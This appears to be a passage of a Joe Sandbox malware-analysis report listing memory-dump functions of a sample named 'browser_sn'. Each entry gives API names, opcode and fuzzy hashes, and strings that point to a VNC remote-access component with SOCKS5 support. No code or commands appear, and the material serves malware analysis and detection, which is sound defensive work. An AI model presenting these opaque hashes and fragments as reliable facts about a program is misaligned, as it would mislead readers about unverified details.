                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$EnterErrorLastLeaveReleaseSemaphore
                                                      • String ID:
                                                      • API String ID: 540623443-0
                                                      • Opcode ID: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
                                                      • Instruction ID: 707f1b58ca20dcd3330818253dc94b9faf62400a2124bc35a3f2f3ea30a7aa6a
                                                      • Opcode Fuzzy Hash: 1ef8894c349e896affc9970763aea91ebceedb24d96a9e68f30ae080b1782f5f
                                                      • Instruction Fuzzy Hash: 57117C22A38A5286DBA0EF71D4806B8A3F0FF88B84F806431DA4E43714DF38E085C710
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Escape$Release
                                                      • String ID:
                                                      • API String ID: 2350829361-0
                                                      • Opcode ID: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
                                                      • Instruction ID: dde748d27117499ef084a6b429d4bfc8527a6dbf87609449c2bf584e053f4f3f
                                                      • Opcode Fuzzy Hash: c485e33178795d9909b89da61998c10babd3cfe1ac8502836bf93b7e6d891906
                                                      • Instruction Fuzzy Hash: 67F01D32B2864287E7349B31B955A2AF6F5FB88784F945139EE4E46F54CE3CE0518B04
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: recvsend
                                                      • String ID: Enter SOCKS5 password for %s@%s:
                                                      • API String ID: 740075404-2439350543
                                                      • Opcode ID: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
                                                      • Instruction ID: 49701a168a9c49ccaa3ea66b05a182f2aa22c28138abfbcd0a31769fd9a773c8
                                                      • Opcode Fuzzy Hash: a17d5de74fc3eb428b78c132b62d7971fded7c0904e229c4df4fc2bd377388f3
                                                      • Instruction Fuzzy Hash: 63510462628A8184E7309B39A4403F9AA91FF46BB8F945335EF6D43BD5DF3CE4058710
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: htonl
                                                      • String ID: .$.
                                                      • API String ID: 2009864989-3769392785
                                                      • Opcode ID: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
                                                      • Instruction ID: 111c67d97ca668c500841ca92b4a91acb0693996274d9a6c4291371238ce9206
                                                      • Opcode Fuzzy Hash: ca89c10cae28c705ea3385c970d3d674c35f6ab879636ad9786b4f134b09557f
                                                      • Instruction Fuzzy Hash: DF41E75192C68209F735BA7298501FEFAD09F47B94F985031EA6E863C7CE2DF8058320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno_invalid_parameter_noinfo
                                                      • String ID: SecureVNC;0;0x%08x;%s
                                                      • API String ID: 2959964966-2465057312
                                                      • Opcode ID: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                      • Instruction ID: 654f512ffaa3dfce82a9c47c7399d6024191729bac65928b359563593e362af9
                                                      • Opcode Fuzzy Hash: dd74be20851cb3f41d9180301c7e16b100e5b1f099809bd476a84f22288f1907
                                                      • Instruction Fuzzy Hash: CB21E532B24B119AE721EF7298515EDB7A4BF097A8B940136EF5C53B89CE38E401C351
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno_invalid_parameter_noinfo
                                                      • String ID: B
                                                      • API String ID: 2959964966-1255198513
                                                      • Opcode ID: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
                                                      • Instruction ID: aa3859ed75024cabd18e84ecd726765986d205521cf26b92b3d3e927ab0f631a
                                                      • Opcode Fuzzy Hash: 779c603700780fbf2f45e9157354add3ac742e15963c7acc544eaab7f6780786
                                                      • Instruction Fuzzy Hash: CB117532B2874185E730AB36A4402ADF6A0FF85BD4F944231EB8D17B96CE3CE544DB15
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Item$MessageSend_errno_invalid_parameter_noinfo
                                                      • String ID: <
                                                      • API String ID: 2439412506-4251816714
                                                      • Opcode ID: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                      • Instruction ID: 87f4d1d0350f33f7b02db4ef7dae548eba4f70149ecc50d2431687bb200df74c
                                                      • Opcode Fuzzy Hash: e51f02eda6ff0a6bcec5b6e3f2d368480529d1570d9d4b28ab8a1b662bfae53e
                                                      • Instruction Fuzzy Hash: A6114F72A2864196E7609F22F4107AAB360FBC8B44F945131EB8D07B55CF3CE956CB50
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileModuleNamePlaySound
                                                      • String ID: ding_dong.wav
                                                      • API String ID: 3032721342-215479118
                                                      • Opcode ID: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
                                                      • Instruction ID: 26c23f6c1688eff205f29fc8d7cb68ccf6666bb354694213e47a2d0585bdf839
                                                      • Opcode Fuzzy Hash: 99ee9350481aafcb6135d7bf9a7cc864814340ecd75d5fca49f2cd5505f22af1
                                                      • Instruction Fuzzy Hash: BE114222A2464591E734DB35F85136AB2A0FF48760F805336EAAD477D4DF3CE114C710
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _errno_invalid_parameter_noinfo
                                                      • String ID: I
                                                      • API String ID: 2959964966-3707901625
                                                      • Opcode ID: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                      • Instruction ID: 182dcf648323d980c3862cc50004c2c1773adf4fad3ffc7a2d4438f05e862f04
                                                      • Opcode Fuzzy Hash: 0f8a1ee3bb14a9a10d344f2e70c888eec5153ea001c92b380a334bbf7f60eb2b
                                                      • Instruction Fuzzy Hash: 9A11A372A1874086EB20AF22A5402A9B7A4FF95FD0F544231EF9C17B95CF3CE5458B00
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$MappingOpenView
                                                      • String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
                                                      • API String ID: 3439327939-3305976270
                                                      • Opcode ID: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                      • Instruction ID: 3d3c5270e731c7c588a1fe30d7abd82e14682ed4a7efdc996d83862f09d96fb8
                                                      • Opcode Fuzzy Hash: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
                                                      • Instruction Fuzzy Hash: 73015E32529B9486E720DB75F4417AAF3A0FB84B64F894235D69A06B94CF7CE450C750
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$MappingOpenView
                                                      • String ID: {34F673E0-878F-11D5-B98A-57B0D07B8C7C}
                                                      • API String ID: 3439327939-2897898322
                                                      • Opcode ID: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                      • Instruction ID: af02368eaecd412e5d93b56c512be853c2c9987c382f8e93ac72571b4b50934d
                                                      • Opcode Fuzzy Hash: de9b61d8815cc09478ebd6b72191161327ba0f804c783efe89e541f53af8c690
                                                      • Instruction Fuzzy Hash: 4B017C32528B9186E730DB74F40066AF3A0FB88B60F850335DA9A06B94CF78E050C710
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: getpeernameinet_ntoa
                                                      • String ID: <unavailable>
                                                      • API String ID: 1982201544-1096956887
                                                      • Opcode ID: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
                                                      • Instruction ID: 8673320bd4ed085c190bf39049dd25cb9a2d4984f4fdba2c12091dda914abaa8
                                                      • Opcode Fuzzy Hash: 66207f79876192fdddc093b2a6677a5d5b27d89d397317eb0c0bd4430368bfbf
                                                      • Instruction Fuzzy Hash: 26018472615645C2EF60AB34E4552A9B3A0FF88B98F845431EA4E4B364DF3CE485CB10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressFreeLibraryProc
                                                      • String ID: DllGetVersion
                                                      • API String ID: 3013587201-2861820592
                                                      • Opcode ID: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
                                                      • Instruction ID: fee7a2f01cc3932b1408fcd31f3ed1ae3fc5b8e75d52075e8fee50277292e136
                                                      • Opcode Fuzzy Hash: d9407479e392a3dac4ac6fa058038886cb0d268972d098779a659bcb989bf816
                                                      • Instruction Fuzzy Hash: C601713262C74182E7249B75B48007AF2A0FF88B94F845139EA8E42768DF7CE554CB10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalDeleteSection
                                                      • String ID: vncclient.cpp : update thread gone
                                                      • API String ID: 166494926-1446885542
                                                      • Opcode ID: 2d4923c2f68f9832232138b20a501600cb9e3c4a288bc86961d0a01cda06857d
                                                      • Instruction ID: fc08800d4c47887d49261de878872099054e33412cea3daa38bf3cca01395718
                                                      • Opcode Fuzzy Hash: 2d4923c2f68f9832232138b20a501600cb9e3c4a288bc86961d0a01cda06857d
                                                      • Instruction Fuzzy Hash: ED015726A28A8290E620AF35D6443F9F361FF45BA4F945231CA6D077A5DF2CE4968320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
